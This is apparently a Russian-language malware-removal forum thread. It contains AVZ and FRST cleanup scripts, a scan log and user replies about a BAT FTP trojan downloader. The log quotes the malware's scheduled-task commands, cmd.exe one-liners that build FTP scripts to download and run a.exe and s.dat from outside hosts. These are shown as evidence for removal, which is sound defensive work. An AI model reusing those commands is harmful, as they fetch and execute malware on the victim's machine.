begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('c:\windows\debug\item.dat>', '');
QuarantineFile('C:\Program Files (x86)\E0C03C8B-1463762770-DF11-AAA2-F707C1D94CDF\knsj692D.tmpfs', '');
DeleteFile('C:\Program Files (x86)\E0C03C8B-1463762770-DF11-AAA2-F707C1D94CDF\knsj692D.tmpfs', '32');
DeleteFile('c:\windows\debug\item.dat>', '32');
DeleteFile('C:\Windows\system32\Tasks\Mysa2', '64');
DeleteFile('C:\Windows\system32\Tasks\Mysa', '64');
DeleteService('besohokuzbt');
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
BC_ImportALL;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.5b6b7b.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O23 - Service S2: Live Zip Code - (besohokuzbt) - C:\Program (file missing)
Start::
CreateRestorePoint:
GroupPolicy\User: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
Task: {9B2F31B5-0122-48E6-8292-04F162DA332B} - \Mysa -> No File <==== ATTENTION
Task: {E1E7D205-C14C-4F15-9DC9-EAB224BFEC24} - \Mysa2 -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:58A5270D [284]
AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:58A5270D [284]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:CB0AACC9 [135]
EmptyTemp:
Reboot:
End::
??Что с проблемами?
мне надо просканировать антивирусом и посмотреть есть ли этот вирус?
Журнал
C:\Windows\System32\p - BAT/TrojanDownloader.Ftp.NSQ троянская программа - очищен удалением [1]
Журнал
C:\Windows\System32\s - BAT/TrojanDownloader.Ftp.NSQ троянская программа - очищен удалением [1]
Они не всплывали, они появлялись только при сканировании. произвел перезагрузку проверил сканированием все чисто. спасибо ВамМожете и просканировать. Я о том, всплывают уведомления после перезагрузки
Просто удалите папку c утилитами.как правильно удалить утилиты если они все в папке автологгер
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?